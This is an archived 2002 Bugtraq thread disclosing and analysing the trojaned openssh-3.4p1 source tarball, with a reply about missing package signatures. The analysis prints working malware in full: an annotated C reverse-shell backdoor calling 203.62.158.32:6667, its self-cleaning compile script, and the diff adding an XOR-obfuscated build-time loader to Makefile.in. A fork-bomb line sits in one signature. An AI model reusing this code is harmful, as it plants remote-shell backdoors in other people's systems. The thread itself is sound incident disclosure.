8799802 2002-08-01 13:20 +0200 /53 rader/ Mikael Olsson <mikael.olsson@clavister.com> Sänt av: joel@lysator.liu.se Importerad: 2002-08-01 15:40 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <23430> Ärende: openssh-3.4p1.tar.gz distribution recently trojaned ------------------------------------------------------------ From: Mikael Olsson <mikael.olsson@clavister.com> To: bugtraq@securityfocus.com Message-ID: <3D49198F.8613D352@clavister.com> From http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security ----- Forwarded message from Edwin Groothuis <edwin@mavetju.org> ----- Date: Thu, 1 Aug 2002 16:55:51 +1000 From: Edwin Groothuis <edwin@mavetju.org> To: incidents@securityfocus.com Subject: openssh-3.4p1.tar.gz trojaned Greetings, Just want to inform you that the OpenSSH package op ftp.openbsd.org (and probably all its mirrors now) it trojaned: ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz The OpenBSD people have been informed about it (via email to deraadt@openbsd.org and via irc.openprojects.org/#openbsd) The changed files are openssh-3.4p1/openbsd-compat/Makefile.in: all: libopenbsd-compat.a + @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out & bf-test.c[1] is nothing more than a wrapper which generates a shell-script[2] which compiles itself and tries to connect to an server running on 203.62.158.32:6667 (web.snsonline.net). [1] http://www.mavetju.org/~edwin/bf-test.c [2] http://www.mavetju.org/~edwin/bf-output.sh This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD ports system: MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8 This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz: MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57 Edwin -- Edwin Groothuis | Personal website: http://www.MavEtJu.org edwin@mavetju.org | Weblog: http://www.mavetju.org/weblog/weblog.php bash$ :(){ :|:&};: | Interested in MUDs? http://www.FatalDimensions.org/ (8799802) /Mikael Olsson <mikael.olsson@clavister.com>/(Ombruten) 8799826 2002-08-01 14:17 +0200 /479 rader/ Christian Bahls <christian.bahls@stud.uni-rostock.de> Sänt av: joel@lysator.liu.se Importerad: 2002-08-01 15:43 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Extern kopiemottagare: Christian Bahls <christian.bahls@stud.uni-rostock.de> Externa svar till: christian.bahls@stud.uni-rostock.de Mottagare: Bugtraq (import) <23431> Ärende: trojan horse in recent openssh (version 3.4 portable 1) ------------------------------------------------------------ From: Christian Bahls <christian.bahls@stud.uni-rostock.de> To: bugtraq@securityfocus.com Cc: Christian Bahls <christian.bahls@stud.uni-rostock.de> Message-ID: <Pine.BSO.4.44.0208011309080.17007-100000@wh5041.stw.uni-rostock.de> [ i am not subscribed to bugtraq .. so if you reply please include me in the cc] i did an analysis on the trojan horse that was hidden in the recent portable version of openssh (3.4p1) it could be found(and still can be) on ftp.openbsd.org and his mirrors. in openssh-3.4p1/openbsd-compat a c-file "bf-test.c" has been added it tells you it has to check for correct handling in HP-UX PL.2 systems .. which is in fact 100% rubbish [PL.1 has been horrible .. so what could PL.2 be? :-] in openssh-3.4p1/openbsd-compat "Makefile.in" has been edited to respect these changes when running make "bf-test.c" compiles to a program which has a shell-script as output the shellscript outputs a c-programm and trys really hard to get it compiled .. and run the c-programm connects to a computer in australia(203.62.158.32) and starts a shell locally if asked by the other computer [ i have not started this programm .. but the server seems to have closed the port 6667(could be a firewall in between though) {this computer probably has been attacked beforehand}] in my opinion this is a really serious attack .. as i have to say: 1.) i do not often check signatures an packets i install 1.a) especialy i wouldn't have thought about the possibility that someone might be able to get access to ftp.openbsd.org (ok this is a sun-os machine at the university of alberta) 2.) i normaly run make on a computer reachable by the net 3.) sometimes one is lazy and just runs make && make install as root you will find all the more interesting stuff below this signature: yours christian bahls math-student university of rostock >> "there she goes .. " ####### # the c-programm # [made readable by my favourite indentation program] # {all comments are by me} ####### #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <unistd.h> #include <errno.h> #include <signal.h> #include <setjmp.h> jmp_buf env; int s; /* * i_val evaluates to /bin/sh */ char *i_val = "\x2f\x62\x69\x6e\x2f\x73\x68"; /* * this is a signal-handler routine * it catches SIGALARM .. closes the socket * and waits for 1 hour and than trys again */ void sig(int sig) { close(s); sleep(3600); longjmp(env, 0); } int main() { int x; char c, *a[2]; struct sockaddr_in sa; struct sigaction act; /* * fork() and continue as background process */ switch (fork()) { case 0: break; default: exit(0); } /* * daemonize a bit (still associated to the same session) */ close(0); close(1); close(2); /* * setup signal handler routines */ memset(&act, 0, sizeof(act)); act.sa_handler = sig; sigaction(SIGALRM, &act, NULL); do { /* * this is where we a going to return after 1h * if we have to retry */ setjmp(env); /* * set up a socket * connect to 203.62.158.32 port 6667 * no this program is not going to do irc */ if ((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) exit(1); memset(&sa, 0, sizeof(sa)); sa.sin_family = AF_INET; sa.sin_port = htons(6667); sa.sin_addr.s_addr = inet_addr("203.62.158.32"); /* * give it 10 seconds to connect * otherwise start over(1h retry time) * if error occurs .. just die */ alarm(10); if (connect(s, (struct sockaddr *) & sa, sizeof(sa)) == (-1)) exit(1); /* * read one char from socket * die if something goes wrong */ if ((x = read(s, &c, 1)) == (-1)) { exit(1); } else if (x == 1) { switch (c) { case 'A': /* we got an 'A' .. just exit() */ exit(0); case 'D': /* we got an 'D' .. set off the * alarm() make the socket * stdin/stdout/stderr .. start a * shell .. finish if it * finishes(execve() behavoir) */ alarm(0); dup2(s, 0); dup2(s, 1); dup2(s, 2); a[0] = i_val; a[1] = NULL; execve(a[0], a, NULL); break; case 'M': /* just retry */ alarm(0); sig(0); break; default: } } else { exit(0); } /* * just loop forever */ } while (1); } ##### # Output of bf-test: ##### >>>SNIPP #!/bin/sh cat >conftest.c <<_ACEOF #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <unistd.h> #include <errno.h> #include <signal.h> #include <setjmp.h> jmp_buf env;int s;char *i_val="\x2f\x62\x69\x6e\x2f\x73\x68";void sig(int sig){close(s);sleep(3600);longjmp(env,0);}int main(){int x;char c,*a[2];struct sockaddr_in sa;struct sigaction act;switch(fork()){case 0:break;default:exit(0);}close(0);close(1);close(2);memset(&act,0,sizeof(act));act.sa_handler=sig;sigaction(SIGALRM,&act,NULL);do{setjmp(env);if((s=socket(AF_INET,SOCK_STREAM,0))==(-1))exit(1);memset(&sa,0,sizeof(sa));sa.sin_family=AF_INET;sa.sin_port=htons(6667);sa.sin_addr.s_addr=inet_addr("203.62.158.32");alarm(10);if(connect(s,(struct sockaddr*)&sa,sizeof(sa))==(-1))exit(1);if((x=read(s,&c,1))==(-1)){exit(1);}else if(x==1){switch(c){case 'A':exit(0);case 'D':alarm(0);dup2(s,0);dup2(s,1);dup2(s,2);a[0]=i_val;a[1]=NULL;execve(a[0],a,NULL);break;case 'M':alarm(0);sig(0);break;default:}}else{exit(0);}}while(1);} _ACEOF (grep -v -i bf-test Makefile.in > m.out ; cp m.out Makefile.in ; rm -f m.out grep -v -i bf-test Makefile > m.out ; cp m.out Makefile ; rm -f m.out rm -f bf-test* TESTPROG="`basename \"\`grep $USER: /etc/passwd\`\"`" if ! test $TESTPROG ; then TESTPROG=sh; fi gcc -w conftest.c -o $TESTPROG ; PATH=.:$PATH $TESTPROG if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi gcc -w conftest.c -lsocket -lnsl -o $TESTPROG; PATH=.:$PATH $TESTPROG if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi cc -w conftest.c -o $TESTPROG ; PATH=.:$PATH $TESTPROG if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi cc -w conftest.c -lsocket -lnsl -o $TESTPROG; PATH=.:$PATH $TESTPROG rm -f ./conftest ./conftest.c $TESTPROG) 1>/dev/null 2>&1 # testing in raw ecb mode <<<SNAPP ###### # diff of different versions .. # one is the trojan .. ###### diff -r -u -N non-trojan/openssh-3.4p1/openbsd-compat/Makefile.in trojan/openssh-3.4p1/openbsd-compat/Makefile.in --- non-trojan/openssh-3.4p1/openbsd-compat/Makefile.in Tue Feb 19 21:27:57 2002 +++ trojan/openssh-3.4p1/openbsd-compat/Makefile.in Wed Jan 31 22:52:03 2001 @@ -26,6 +26,7 @@ $(CC) $(CFLAGS) $(CPPFLAGS) -c $< all: libopenbsd-compat.a + @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out & $(COMPAT): ../config.h $(OPENBSD): ../config.h diff -r -u -N non-trojan/openssh-3.4p1/openbsd-compat/bf-test.c trojan/openssh-3.4p1/openbsd-compat/bf-test.c --- non-trojan/openssh-3.4p1/openbsd-compat/bf-test.c Thu Jan 1 01:00:00 1970 +++ trojan/openssh-3.4p1/openbsd-compat/bf-test.c Wed Jan 31 22:52:03 2001 @@ -0,0 +1,251 @@ +/* + * Blowfish input vectors are handled incorrectly on HP-UX PL.2 systems. + * Perform routine compatability checks. + */ +#include <stdio.h> + +#define KEY_TEST_NUM 25 +static unsigned char key_test[KEY_TEST_NUM]={ + 0xf0,0xe1,0xd2,0xc3,0xb4,0xa5,0x96,0x87, + 0x78,0x69,0x5a,0x4b,0x3c,0x2d,0x1e,0x0f, + 0x00,0x11,0x22,0x33,0x44,0x55,0x66,0x77, + 0x88}; + +/* DES cbc input vectors */ +static unsigned char ecb_data[]={ + + 0x0c,0x0e,0x00,0x4d,0x46,0x41,0x00,0x5c,0x47,0x25,0x4c, + 0x4e,0x5b,0x0f,0x11,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c, + 0x5b,0x01,0x4c,0x0f,0x13,0x13,0x70,0x6e,0x6c,0x6a,0x60, + 0x69,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f, + 0x13,0x5c,0x5b,0x4b,0x46,0x40,0x01,0x47,0x11,0x0f,0x25, + 0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f,0x13,0x5c, + 0x56,0x5c,0x00,0x5b,0x56,0x5f,0x4a,0x5c,0x01,0x47,0x11, + 0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f, + 0x13,0x5c,0x56,0x5c,0x00,0x5c,0x40,0x4c,0x44,0x4a,0x5b, + 0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a, + 0x4b,0x4a,0x0f,0x13,0x41,0x4a,0x5b,0x46,0x41,0x4a,0x5b, + 0x00,0x46,0x41,0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41, + 0x4c,0x43,0x5a,0x4b,0x4a,0x0f,0x13,0x5a,0x41,0x46,0x5c, + 0x5b,0x4b,0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c, + 0x43,0x5a,0x4b,0x4a,0x0f,0x13,0x4a,0x5d,0x5d,0x41,0x40, + 0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a, + 0x4b,0x4a,0x0f,0x13,0x5c,0x46,0x48,0x41,0x4e,0x43,0x01, + 0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b, + 0x4a,0x0f,0x13,0x5c,0x4a,0x5b,0x45,0x42,0x5f,0x01,0x47, + 0x11,0x0f,0x25,0x45,0x42,0x5f,0x70,0x4d,0x5a,0x49,0x0f, + 0x4a,0x41,0x59,0x14,0x46,0x41,0x5b,0x0f,0x5c,0x14,0x4c, + 0x47,0x4e,0x5d,0x0f,0x05,0x46,0x70,0x59,0x4e,0x43,0x12, + 0x0d,0x73,0x57,0x1d,0x49,0x73,0x57,0x19,0x1d,0x73,0x57, + 0x19,0x16,0x73,0x57,0x19,0x4a,0x73,0x57,0x1d,0x49,0x73, + 0x57,0x18,0x1c,0x73,0x57,0x19,0x17,0x0d,0x14,0x59,0x40, + 0x46,0x4b,0x0f,0x5c,0x46,0x48,0x07,0x46,0x41,0x5b,0x0f, + 0x5c,0x46,0x48,0x06,0x54,0x4c,0x43,0x40,0x5c,0x4a,0x07, + 0x5c,0x06,0x14,0x5c,0x43,0x4a,0x4a,0x5f,0x07,0x1c,0x19, + 0x1f,0x1f,0x06,0x14,0x43,0x40,0x41,0x48,0x45,0x42,0x5f, + 0x07,0x4a,0x41,0x59,0x03,0x1f,0x06,0x14,0x52,0x46,0x41, + 0x5b,0x0f,0x42,0x4e,0x46,0x41,0x07,0x06,0x54,0x46,0x41, + 0x5b,0x0f,0x57,0x14,0x4c,0x47,0x4e,0x5d,0x0f,0x4c,0x03, + 0x05,0x4e,0x74,0x1d,0x72,0x14,0x5c,0x5b,0x5d,0x5a,0x4c, + 0x5b,0x0f,0x5c,0x40,0x4c,0x44,0x4e,0x4b,0x4b,0x5d,0x70, + 0x46,0x41,0x0f,0x5c,0x4e,0x14,0x5c,0x5b,0x5d,0x5a,0x4c, + 0x5b,0x0f,0x5c,0x46,0x48,0x4e,0x4c,0x5b,0x46,0x40,0x41, + 0x0f,0x4e,0x4c,0x5b,0x14,0x5c,0x58,0x46,0x5b,0x4c,0x47, + 0x07,0x49,0x40,0x5d,0x44,0x07,0x06,0x06,0x54,0x4c,0x4e, + 0x5c,0x4a,0x0f,0x1f,0x15,0x4d,0x5d,0x4a,0x4e,0x44,0x14, + 0x4b,0x4a,0x49,0x4e,0x5a,0x43,0x5b,0x15,0x4a,0x57,0x46, + 0x5b,0x07,0x1f,0x06,0x14,0x52,0x4c,0x43,0x40,0x5c,0x4a, + 0x07,0x1f,0x06,0x14,0x4c,0x43,0x40,0x5c,0x4a,0x07,0x1e, + 0x06,0x14,0x4c,0x43,0x40,0x5c,0x4a,0x07,0x1d,0x06,0x14, + 0x42,0x4a,0x42,0x5c,0x4a,0x5b,0x07,0x09,0x4e,0x4c,0x5b, + 0x03,0x1f,0x03,0x5c,0x46,0x55,0x4a,0x40,0x49,0x07,0x4e, + 0x4c,0x5b,0x06,0x06,0x14,0x4e,0x4c,0x5b,0x01,0x5c,0x4e, + 0x70,0x47,0x4e,0x41,0x4b,0x43,0x4a,0x5d,0x12,0x5c,0x46, + 0x48,0x14,0x5c,0x46,0x48,0x4e,0x4c,0x5b,0x46,0x40,0x41, + 0x07,0x7c,0x66,0x68,0x6e,0x63,0x7d,0x62,0x03,0x09,0x4e, + 0x4c,0x5b,0x03,0x61,0x7a,0x63,0x63,0x06,0x14,0x4b,0x40, + 0x54,0x5c,0x4a,0x5b,0x45,0x42,0x5f,0x07,0x4a,0x41,0x59, + 0x06,0x14,0x46,0x49,0x07,0x07,0x5c,0x12,0x5c,0x40,0x4c, + 0x44,0x4a,0x5b,0x07,0x6e,0x69,0x70,0x66,0x61,0x6a,0x7b, + 0x03,0x7c,0x60,0x6c,0x64,0x70,0x7c,0x7b,0x7d,0x6a,0x6e, + 0x62,0x03,0x1f,0x06,0x06,0x12,0x12,0x07,0x02,0x1e,0x06, + 0x06,0x4a,0x57,0x46,0x5b,0x07,0x1e,0x06,0x14,0x42,0x4a, + 0x42,0x5c,0x4a,0x5b,0x07,0x09,0x5c,0x4e,0x03,0x1f,0x03, + 0x5c,0x46,0x55,0x4a,0x40,0x49,0x07,0x5c,0x4e,0x06,0x06, + 0x14,0x5c,0x4e,0x01,0x5c,0x46,0x41,0x70,0x49,0x4e,0x42, + 0x46,0x43,0x56,0x12,0x6e,0x69,0x70,0x66,0x61,0x6a,0x7b, + 0x14,0x5c,0x4e,0x01,0x5c,0x46,0x41,0x70,0x5f,0x40,0x5d, + 0x5b,0x12,0x47,0x5b,0x40,0x41,0x5c,0x07,0x19,0x19,0x19, + 0x18,0x06,0x14,0x5c,0x4e,0x01,0x5c,0x46,0x41,0x70,0x4e, + 0x4b,0x4b,0x5d,0x01,0x5c,0x70,0x4e,0x4b,0x4b,0x5d,0x12, + 0x46,0x41,0x4a,0x5b,0x70,0x4e,0x4b,0x4b,0x5d,0x07,0x0d, + 0x1d,0x1f,0x1c,0x01,0x19,0x1d,0x01,0x1e,0x1a,0x17,0x01, + 0x1c,0x1d,0x0d,0x06,0x14,0x4e,0x43,0x4e,0x5d,0x42,0x07, + 0x1e,0x1f,0x06,0x14,0x46,0x49,0x07,0x4c,0x40,0x41,0x41, + 0x4a,0x4c,0x5b,0x07,0x5c,0x03,0x07,0x5c,0x5b,0x5d,0x5a, + 0x4c,0x5b,0x0f,0x5c,0x40,0x4c,0x44,0x4e,0x4b,0x4b,0x5d, + 0x05,0x06,0x09,0x5c,0x4e,0x03,0x5c,0x46,0x55,0x4a,0x40, + 0x49,0x07,0x5c,0x4e,0x06,0x06,0x12,0x12,0x07,0x02,0x1e, + 0x06,0x06,0x4a,0x57,0x46,0x5b,0x07,0x1e,0x06,0x14,0x46, + 0x49,0x07,0x07,0x57,0x12,0x5d,0x4a,0x4e,0x4b,0x07,0x5c, + 0x03,0x09,0x4c,0x03,0x1e,0x06,0x06,0x12,0x12,0x07,0x02, + 0x1e,0x06,0x06,0x54,0x4a,0x57,0x46,0x5b,0x07,0x1e,0x06, + 0x14,0x52,0x4a,0x43,0x5c,0x4a,0x0f,0x46,0x49,0x07,0x57, + 0x12,0x12,0x1e,0x06,0x54,0x5c,0x58,0x46,0x5b,0x4c,0x47, + 0x07,0x4c,0x06,0x54,0x4c,0x4e,0x5c,0x4a,0x0f,0x08,0x6e, + 0x08,0x15,0x4a,0x57,0x46,0x5b,0x07,0x1f,0x06,0x14,0x4c, + 0x4e,0x5c,0x4a,0x0f,0x08,0x6b,0x08,0x15,0x4e,0x43,0x4e, + 0x5d,0x42,0x07,0x1f,0x06,0x14,0x4b,0x5a,0x5f,0x1d,0x07, + 0x5c,0x03,0x1f,0x06,0x14,0x4b,0x5a,0x5f,0x1d,0x07,0x5c, + 0x03,0x1e,0x06,0x14,0x4b,0x5a,0x5f,0x1d,0x07,0x5c,0x03, + 0x1d,0x06,0x14,0x4e,0x74,0x1f,0x72,0x12,0x46,0x70,0x59, + 0x4e,0x43,0x14,0x4e,0x74,0x1e,0x72,0x12,0x61,0x7a,0x63, + 0x63,0x14,0x4a,0x57,0x4a,0x4c,0x59,0x4a,0x07,0x4e,0x74, + 0x1f,0x72,0x03,0x4e,0x03,0x61,0x7a,0x63,0x63,0x06,0x14, + 0x4d,0x5d,0x4a,0x4e,0x44,0x14,0x4c,0x4e,0x5c,0x4a,0x0f, + 0x08,0x62,0x08,0x15,0x4e,0x43,0x4e,0x5d,0x42,0x07,0x1f, + 0x06,0x14,0x5c,0x46,0x48,0x07,0x1f,0x06,0x14,0x4d,0x5d, + 0x4a,0x4e,0x44,0x14,0x4b,0x4a,0x49,0x4e,0x5a,0x43,0x5b, + 0x15,0x52,0x52,0x4a,0x43,0x5c,0x4a,0x54,0x4a,0x57,0x46, + 0x5b,0x07,0x1f,0x06,0x14,0x52,0x52,0x58,0x47,0x46,0x43, + 0x4a,0x07,0x1e,0x06,0x14,0x52,0x25,0x70,0x6e,0x6c,0x6a, + 0x60,0x69,0x25,0x07,0x48,0x5d,0x4a,0x5f,0x0f,0x02,0x59, + 0x0f,0x02,0x46,0x0f,0x4d,0x49,0x02,0x5b,0x4a,0x5c,0x5b, + 0x0f,0x62,0x4e,0x44,0x4a,0x49,0x46,0x43,0x4a,0x01,0x46, + 0x41,0x0f,0x11,0x0f,0x42,0x01,0x40,0x5a,0x5b,0x0f,0x14, + 0x0f,0x4c,0x5f,0x0f,0x42,0x01,0x40,0x5a,0x5b,0x0f,0x62, + 0x4e,0x44,0x4a,0x49,0x46,0x43,0x4a,0x01,0x46,0x41,0x0f, + 0x14,0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x42,0x01,0x40, + 0x5a,0x5b,0x25,0x48,0x5d,0x4a,0x5f,0x0f,0x02,0x59,0x0f, + 0x02,0x46,0x0f,0x4d,0x49,0x02,0x5b,0x4a,0x5c,0x5b,0x0f, + 0x62,0x4e,0x44,0x4a,0x49,0x46,0x43,0x4a,0x0f,0x11,0x0f, + 0x42,0x01,0x40,0x5a,0x5b,0x0f,0x14,0x0f,0x4c,0x5f,0x0f, + 0x42,0x01,0x40,0x5a,0x5b,0x0f,0x62,0x4e,0x44,0x4a,0x49, + 0x46,0x43,0x4a,0x0f,0x14,0x0f,0x5d,0x42,0x0f,0x02,0x49, + 0x0f,0x42,0x01,0x40,0x5a,0x5b,0x25,0x5d,0x42,0x0f,0x02, + 0x49,0x0f,0x4d,0x49,0x02,0x5b,0x4a,0x5c,0x5b,0x05,0x25, + 0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x12,0x0d,0x4f, + 0x4d,0x4e,0x5c,0x4a,0x41,0x4e,0x42,0x4a,0x0f,0x73,0x0d, + 0x73,0x4f,0x48,0x5d,0x4a,0x5f,0x0f,0x0b,0x7a,0x7c,0x6a, + 0x7d,0x15,0x0f,0x00,0x4a,0x5b,0x4c,0x00,0x5f,0x4e,0x5c, + 0x5c,0x58,0x4b,0x73,0x4f,0x73,0x0d,0x4f,0x0d,0x25,0x46, + 0x49,0x0f,0x0f,0x0e,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,0x0b, + 0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x14,0x0f, + 0x5b,0x47,0x4a,0x41,0x0f,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d, + 0x60,0x68,0x12,0x5c,0x47,0x14,0x0f,0x49,0x46,0x0f,0x25, + 0x48,0x4c,0x4c,0x0f,0x02,0x58,0x0f,0x4c,0x40,0x41,0x49, + 0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x02,0x40,0x0f,0x0b, + 0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x14,0x0f, + 0x7f,0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,0x7b, + 0x67,0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68, + 0x25,0x46,0x49,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,0x0b,0x7b, + 0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x5b,0x47,0x4a, + 0x41,0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,0x00,0x4c, + 0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,0x00,0x4c, + 0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x0b, + 0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x09,0x09, + 0x0f,0x4a,0x57,0x46,0x5b,0x14,0x49,0x46,0x25,0x48,0x4c, + 0x4c,0x0f,0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,0x5b,0x4a, + 0x5c,0x5b,0x01,0x4c,0x0f,0x02,0x43,0x5c,0x40,0x4c,0x44, + 0x4a,0x5b,0x0f,0x02,0x43,0x41,0x5c,0x43,0x0f,0x02,0x40, + 0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14, + 0x0f,0x7f,0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e, + 0x7b,0x67,0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60, + 0x68,0x0f,0x25,0x46,0x49,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f, + 0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x5b, + 0x47,0x4a,0x41,0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01, + 0x00,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01, + 0x00,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c, + 0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f, + 0x09,0x09,0x0f,0x4a,0x57,0x46,0x5b,0x14,0x49,0x46,0x25, + 0x4c,0x4c,0x0f,0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,0x5b, + 0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x02,0x40,0x0f,0x0b,0x7b, + 0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x14,0x0f,0x7f, + 0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,0x7b,0x67, + 0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x25, + 0x46,0x49,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,0x0b,0x7b,0x6a, + 0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x5b,0x47,0x4a,0x41, + 0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,0x00,0x4c,0x40, + 0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,0x00,0x4c,0x40, + 0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x0b,0x7b, + 0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x09,0x09,0x0f, + 0x4a,0x57,0x46,0x5b,0x14,0x49,0x46,0x25,0x4c,0x4c,0x0f, + 0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b, + 0x01,0x4c,0x0f,0x02,0x43,0x5c,0x40,0x4c,0x44,0x4a,0x5b, + 0x0f,0x02,0x43,0x41,0x5c,0x43,0x0f,0x02,0x40,0x0f,0x0b, + 0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x0f,0x7f, + 0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,0x7b,0x67, + 0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x25, + 0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,0x00,0x4c,0x40,0x41, + 0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,0x00,0x4c,0x40,0x41, + 0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x0b,0x7b,0x6a, + 0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x06,0x0f,0x1e,0x11,0x00, + 0x4b,0x4a,0x59,0x00,0x41,0x5a,0x43,0x43,0x0f,0x1d,0x11, + 0x09,0x1e,0x25,0x00}; + +/* big endian */ +static unsigned long bfplain[2][2]={ + {0x424c4f57L,0x46495348L}, + {0xfedcba98L,0x76543210L} + }; + +static unsigned long bfcipher[2][2]={ + {0x324ed0feL,0xf413a203L}, + {0xcc91732bL,0x8022f684L} + }; + + +static unsigned char ocb_data[]={ + 0x4d,0x2c,0x20,0x73,0x69,0x67,0x29,0x3b, + 0x0a,0x20,0x64,0x6f,0x20,0x7b,0x0a,0x20, + 0x20,0x73,0x65,0x74,0x6a,0x6d,0x70,0x28, + 0x00}; + +static unsigned char cbc_key [16]={ + 0x01,0x23,0x45,0x67,0x89,0xab,0xcd,0xef, + 0xf0,0xe1,0xd2,0xc3,0xb4,0xa5,0x96,0x87}; + +static unsigned char cbc_iv [8]={0xfe,0xdc,0xba,0x98,0x76,0x54,0x32,0x10}; + +#if defined(WIN16) || defined(__LP32__) +#elif defined(_CRAY) || defined(__ILP64__) +/* + * _CRAY note. I could declare short, but I have no idea what impact + * does it have on performance on none-T3E machines. I could declare + * int, but at least on C90 sizeof(int) can be chosen at compile time. + * So I've chosen long... + * <appro@fy.chalmers.se> + */ +#else +#endif + +main(void) +{ + int i, n, err; + unsigned char cbc_in[40],cbc_out[40],iv[8]; + + dup2(1, 2); +#ifdef CHARSET_EPCDIC + epcdic2ascii(ecb_data, strlen(ecb_data)); +#endif + + printf("# testing in raw ecb mode\n"); + + n=0; + if (memcmp(&(bfcipher[n][0]),&(cbc_iv[0]),8) != 0) + { + err = 1; + } + + if (memcmp(&(bfplain[n][0]),&(cbc_iv[0]),8) != 0) + { + err = 1; + } + + if (err) + { + for (i = 0; i < sizeof(ecb_data)-1; i++) + fprintf(stderr, "%c", ecb_data[i] ^ 47); + } +return(0); +} (8799826) /Christian Bahls <christian.bahls@stud.uni-rostock.de>/(Ombruten) Kommentar i text 8799863 Kommentar i text 8802039 av Jim Breton <jamesb-bugtraq@alongtheway.com> 8802039 2002-08-01 18:45 +0000 /29 rader/ Jim Breton <jamesb-bugtraq@alongtheway.com> Sänt av: joel@lysator.liu.se Importerad: 2002-08-02 00:33 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <23459> Kommentar till text 8799826 av Christian Bahls <christian.bahls@stud.uni-rostock.de> Ärende: Re: trojan horse in recent openssh (version 3.4 portable 1) ------------------------------------------------------------ From: Jim Breton <jamesb-bugtraq@alongtheway.com> To: bugtraq@securityfocus.com Message-ID: <20020801184534460715.G1299@alongtheway.com> On Thu, Aug 01, 2002 at 02:17:36PM +0200, Christian Bahls wrote: > 1.) i do not often check signatures an packets i install Particularly difficult when there _are no_ signatures available for the package you want to install (in this case, the non-"portable" tarballs). AFAIK there have never been signatures available for the OpenBSD tarballs. At least none that I've seen on the FTP server. I hope this will change soon...? I have also been curious as to how exactly DJM and the portability group have been verifying that _they_ obtained clean tarballs before applying their modifications. If they also have no way to verify tarballs, that effectively blinds a very important set of eyes from being able to spot trojans. (Of course, if they are just doing CVS checkouts from a secure CVS server, this issue would be 